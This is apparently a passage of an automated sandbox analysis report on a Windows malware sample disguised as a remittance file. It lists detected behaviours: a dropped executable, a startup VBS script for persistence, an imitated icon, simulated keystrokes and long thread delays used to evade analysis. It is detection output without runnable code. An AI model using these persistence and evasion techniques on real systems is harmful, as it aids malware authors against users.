                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02468C2F pushfd ; iretd 3_2_02468C30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02468DDF push esp; iretd 3_2_02468DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06162DBE pushfd ; retf 3_2_06162DC1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06169241 push es; ret 3_2_06169244
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00416CB5 push ecx; ret 6_2_00416CC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_02BC9C30 push esp; retf 02BEh 7_2_02BC9D55
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_02BC4A2D push eax; ret 7_2_02BC4962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_02BC48F8 push eax; ret 7_2_02BC4912
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_02BC4988 push eax; ret 7_2_02BC4992
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_02BC4978 push eax; ret 7_2_02BC4982
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_02BC4968 push eax; ret 7_2_02BC4972
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | File created: C:\Users\user\AppData\Local\directory\name.exe (dropped file)

                  Boot Survival

                  Source: C:\Users\user\AppData\Local\directory\name.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs (dropped file)
                  Source: C:\Users\user\AppData\Local\directory\name.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                  Hooking and other Techniques for Hiding and Protection

                  Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (8).png
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 6_2_0047A330
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_00434418
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 3F4966C
                  Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 3F59ED4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599764
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599546
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599327
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599217
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598997
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597352
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594811
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596937
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596499
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596171
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596062
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595625
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595515
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595296
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595187
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594640
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 8269
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1579
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 8371
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1485
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                  Source: C:\Users\user\AppData\Local\directory\name.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe API coverage: 3.6 %
                  Source: C:\Users\user\AppData\Local\directory\name.exe API coverage: 3.7 %
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0045DE8F FindFirstFileW,FindClose
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594811Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594700Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596499Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595187Jump to behavior
